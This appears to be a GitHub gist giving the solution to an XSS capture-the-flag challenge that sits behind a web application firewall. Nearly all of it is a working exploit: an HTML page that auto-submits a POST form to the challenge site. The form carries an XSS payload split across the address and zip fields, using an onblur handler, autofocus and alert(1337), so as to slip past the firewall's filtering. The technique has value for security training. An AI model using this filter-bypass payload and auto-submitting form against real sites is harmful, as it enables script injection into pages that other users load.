XSS Challenge - Sh*t it's a WAF Solution
| <html> | |
| <!-- XSS Challenge Solution: | |
| Address Line 1: "onblur<='` | |
| Address Line 2: `;alert(1337)'autofocus x=" | |
| Zip Code: "autofocus x= | |
| --> | |
| <body> | |
| <form action="http://xss-challenge.secgeek.net/" method="POST"> | |
| <input type="hidden" name="fullname" value="" /> | |
| <input type="hidden" name="address1" value=""onblur<='`" /> | |
| <input type="hidden" name="address2" value="`;alert(1337)'autofocus x="" /> | |
| <input type="hidden" name="country" value="" /> | |
| <input type="hidden" name="city" value="" /> | |
| <input type="hidden" name="state" value="" /> | |
| <input type="hidden" name="zip" value=""autofocus x=" /> | |
| <input type="hidden" name="user_selected" value="false" /> | |
| </form> | |
| <script>document.forms[0].submit()</script> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment